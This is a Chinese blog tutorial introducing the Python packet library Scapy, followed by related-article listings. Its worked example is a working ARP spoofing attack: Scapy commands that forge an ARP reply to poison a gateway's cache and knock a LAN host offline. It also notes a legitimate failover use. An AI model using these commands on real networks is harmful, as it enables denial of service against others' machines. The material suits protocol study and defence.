网络协议从入门到上瘾--初识Scapy

最新推荐文章于 2024-09-14 17:58:44 发布
最新推荐文章于 2024-09-14 17:58:44 发布
阅读量373 收藏 1
点赞数
分类专栏: 网络协议 文章标签: Scapy ARP 网络 协议 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010049696/article/details/112168092
版权

互联网的核心是一系列协议,总称为“互联网协议”。它们对电脑如何连接和组网,做出来详尽的规定。理解了这些协议,就是理解了互联网的原理。

在面试或者工作过程中,我们对我们知道的网络协议侃侃而谈,五层模型,osi七层模型,三次握手,四次挥手,TCP/IP协议族,ICMP,ARP,HTTP,SNMP,广播,多播,组播,单播等等概念信手拈来。但是当遇到无法解决的网络问题时,我们可能开始怀疑自己是否真的理解了这些协议。毕竟大部分时候,我们只是记忆了这些概念,并在工作中利用前人发明的网络工具和经验解决工作中遇到的问题。

Scapy是一个建立在Python环境之上的网络数据包操作程序,可以很容易随意操控网络数据包,从而利用它很容易的理解网络协议的工作原理。

下面利用网络协议和Scapy实现一个有意思的程序:

使用Scapy攻击局域网主机,使被攻击主机断网。原理很简单,就是利用免费ARP,修改网关中被攻击主机的ARP缓存。

1.查询局域网网关

[root@controller ~]# ip route
default via 192.168.91.254 dev ens192 
169.254.0.0/16 dev ens192 scope link metric 1002

其中,192.168.91.254即是局域网网关ip地址。

2.安装Scapy

pip install scapy

3.在命令行执行scapy,启动scapy交换界面

4.使用Scapy构建免费ARP应答包

>>>arp = ARP(op=2,hwsrc="00:0c:22:33:cc:cc",hwdst="80:05:88:b5:88:64",pdst='192.168.91.254',psrc='192.168.90.22')

其中,op=2表示该arp包是应答包(根据arp协议,1表示请求,2表示应答);该arp包模拟了192.168.90.22应答网关192.168.91.254的arp应答包,网关收到该应答包后,会更新arp缓存,即修改192.168.90.22的mac为00:0c:22:33:cc:cc。

5.发送ARP应答包

>>>sendp(Ether(dst="80:05:88:b5:88:64")/arp)

向网关发送免费arp应答包,刷新网关ARP缓存。ARP请求是广播方式,ARP应答是单播方式。dst是网关的mac地址。

6.在被攻击主机中ping有效ip地址,检测被攻击主机网络是否受到影响

[root@compute1 ~]# ping www.baidu.com
ping: www.baidu.com: Name or service not known

小结

上述实验只是Scapy的一个小应用,看似很鸡肋,且没有任何实用价值,但是在实际中工作中是有用武之地的。比如在高可用场景下,网络服务发生主备切换,如果刚切换到主机的mac地址不能很快通知网关,则网关将会继续把流量发送给刚降级的备机。通过主动发送免费arp应答包,可以避免此类问题。

如果对云计算感兴趣,可以关注我的微信公众号:

 

half-beast
关注
专栏目录
简单的发包工具——网络协议编辑器(python+scapy+pycharm)
wmren
05-26 2万+
GUI界面,TCP/IP协议栈5层协议中实现了MAC、ARP、IP 、TCP、UDP协议的编辑与发送。 注:程序源代码在我的上传资源中
Scapy网络世界的瑞士军刀,揭秘Python下的网络协议分析
AIGC搞起
08-15 857
网络的世界中,数据包如同海洋中的水分子,无处不在却又难以捉摸。但有了Scapy,Python编程语言中的一个强大库,我们就能够像使用显微镜一样,细致观察和分析这些数据包。Scapy不仅能够发送、捕获、分析和修改网络数据包,还能够构建新的数据包。这使得它在网络安全分析、协议开发和教育领域中变得极其重要。Scapy是一个功能强大且灵活的Python库,它为网络协议分析和开发提供了丰富的工具。通过本文的介绍,我们了解了Scapy的安装、基本使用、实际应用场景以及常见问题的解决方法。
scapy使用教程,scapy可以仿造和解析大量协议类型的包
02-19
scapy是一个强大的交互式(interactive)的包操作程序,用python写的,有一个python的命令行解释器界面,可直接运行,当然也可以作为第三库,在我们的python程序中import进去使用它的类和方法。
Python的Scapy库详解
最新发布
theoxiong的博客
09-14 1463
Python的Scapy库是一个强大且灵活的网络数据包处理库,常用于网络安全、渗透测试、网络分析等场景。它提供了轻松构建、解析、修改和发送网络数据包的能力,不仅支持常见的网络协议,还可以进行自定义协议开发。本文将详细介绍Scapy库的核心功能及其应用场景。Scapy是一个基于 Python 的网络包处理库,它能够处理从第2层到第4层的多种协议(如 Ethernet、IP、TCP、UDP等),还支持各种网络扫描、探测、攻击模拟等功能。
python scapy发包_网络协议编辑器――简单的发包工具实现(python+scapy+pycharm)
weixin_39713578的博客
12-13 1197
一、实现的功能二、主要函数说明――IP包的编辑与发送为例1.创建IP包编辑器界面,为每个按钮绑定单击响应时间。def create_ip_sender():…2. 在协议字段编辑框中填入默认IP包的字段值,为IP数据包的发送做好准备def create_default_ip_packet(entries):3.获取协议编辑器文本框的值,创建对应的数据包并开启一个线程用于连续发送数据包。def se...
CENTOS上的网络安全工具(八)Scapy协议解析
lhyzws的专栏
08-10 3331
以DNS为例,简述基于scapy解析pcap文件,提取协议元数据,并在pymysql和pandas配合下,使用mysql进行数据管理和检索使用的方法。
了解Scapy工作原理
weixin_43838889的博客
09-13 756
我们将了解 Scapy 的工作原理以及我们如何使用它来创建我们自己的网络操作工具。 让我们创建一个名为 1.py 的新文件并打开它。 打开文件后,我们可以导入文件中的任何 Scapy 模块。 在本节中,我们将为任何网站创建一个小的 ping 请求。 Ping 请求通常用于测试设备是否可用。 ping 请求(也称为回显请求) #-*- coding:utf-8 -*- from scapy.all import ICMP #使用底层 ICMP 应用层协议。 要在程序中导入包 from scapy.a...
scapy-icap:scapy 的 ICAP1.0 协议实现(从 invernizzi 的 scapy-http 复制代码)
06-08
scapy 的 ICAP/1.0 协议实现(从 invernizzi 的 scapy-http 复制代码) 用法 [root@user ~]$ scapy WARNING: No route found for IPv6 destination :: (no default route?) Welcome to Scapy (2.2.0-dev) >>> ...
scapy-ssl_tls-1.2.3.4.zip
04-11
Scapy-ssl_tls是Python中一个强大的工具,用于解析、构造和操纵网络协议的数据包,特别是在处理SSL/TLS加密通信时。这个库扩展了著名的Scapy框架,使其能够解码和构建SSL/TLS协议的数据包,这对于网络安全分析、渗透...
django-scapy:使用Django和Scapy的基于Web的网络协议分析器
05-17
使用Django和Scapy的基于Web的网络协议分析器 这是一个在制品。 目前仅支持python3。 快速安装: 克隆仓库 创建一个Postgres DB Scapy 创建一个dbuser:createuser scapy -s -P(也传递scapy) 为项目创建一个...
pcap-1.1-scapy-20090720.win32-py2.5
03-13
pcap-1.1-scapy-20090720.win32-py2.5
scapy-fakeap:使用Python和Scapy的伪无线接入点(AP)实现,旨在方便地测试802.11协议和实现
05-17
虚假假货 使用Python和Scapy的伪无线接入点(AP)实现,旨在方便地测试802.11协议和实现。 该库正在开发中,目前仅支持开放的802.11网络。 动机 ...从那里开始,用scapy-fakeap设置基本AP非常简单,
基于scapy doip协议包实践
lfyloveyou的博客
02-12 1335
基于scapy doip协议包实践
一文秒懂Scrapy原理
m0_49501453的博客
09-11 683
一文秒懂Scrapy scrapy架构图解 Spiders(爬虫):它负责处理所有Responses,从中分析提取数据,获取Item字段需要的数据,并将需要跟进的URL提交给引擎,再次进入Scheduler(调度器) Engine(引擎):负责Spider、ItemPipeline、Downloader、Scheduler中间的通讯,信号、数据传递等。 Scheduler(调度器):它负责接受引擎发送过来的Request请求,并按照一定的方式进行整理排列,入队,当引擎需要时,交还给引擎。 Downlo
Linux系统重新启动后路由与IP不匹配导致不能上网的问题
Keep Moving
07-26 897
None:本博客非原创,是我搭建过程中的一些错误,如果你有幸看到,希望对你有帮助。 以下是参考过的博客地址 Rasa 入坑指南二:基于 Rasa 构建天气查询机器人 python——Rasa多轮对话框架,及依赖的mitie在windows安装步骤 ...
数据包工具--Scapy基础篇
枫零NET的博客,分享一些自己喜欢的技术
06-09 9604
零、前言 学习过程中用到Scapy这个工具,用了一些小功能之后发现效果挺好的,自由度高,比其他的很多工具的可自定义程度要高太多了,所以写一篇Scapy基础篇分享给各位,希望能对各位有用。
基于Scapy的传统网络攻击实现
a1379292747的博客
09-14 3285
Scapy是一个由Python编写的强大工具,目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。Scapy还是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送,捕获它们,匹配请求和回复等等。Scapy可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现。它可以取代hping,arpspoof,arp-sk,arping,甚至是Nmap,tcpdump和tshark的某些部分。
Python中Scapy使用方法,模块中的常用函数,简单的端口扫描编写
热门推荐
sGanYu
07-08 1万+
目录scapy是什么scapy的使用IP()src()和dst()Ether()采用分层的方式来构造数据包raw()和hexdump()summary()和show()如何在scapy中发送和接收数据包send()和sendp()sr()、sr1()和srp()简单的端口扫描sniff()使用scapy编写简单的端口扫描scapy是一个可用作网络嗅探,独立运行的工具,它提供了一个和python相同的交互方式命令行环境,可以在kali内单独运行,该类库在网络安全领域有非常广泛用例,可用于漏洞利用开发、流量的分
分别用netwox和scapy进行TCP 会话劫持攻击,包括注入普通命令和反向shell
m0_56222998的博客
04-20 1148
发起TCP会话劫持攻击,并且能够反向shell
python--scapy
09-02
Scapy是一个强大的Python库,用于网络数据包的创建、发送和分析。它允许用户以非常灵活的方式构造自定义网络协议包,并且可以通过各种方式与网络进行交互。下面是一些Scapy的基本用法示例: 1. 导入Scapy库: ```python from scapy.all import * ``` 2. 构造和发送网络数据包: ```python # 创建一个IP数据包 ip_packet = IP(dst="192.168.0.1") # 创建一个TCP数据包 tcp_packet = TCP(dport=80) # 发送数据包 send(ip_packet/tcp_packet) ``` 3. 接收和分析网络数据包: ```python # 设置网络接口 interface = "eth0" # 开启网络监听 sniff(iface=interface, filter="tcp", count=10, prn=lambda x: x.summary()) ``` 这只是Scapy的一小部分功能,它还支持更多高级特性,如网络探测、MITM攻击等。你可以参考Scapy的官方文档和示例代码来了解更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值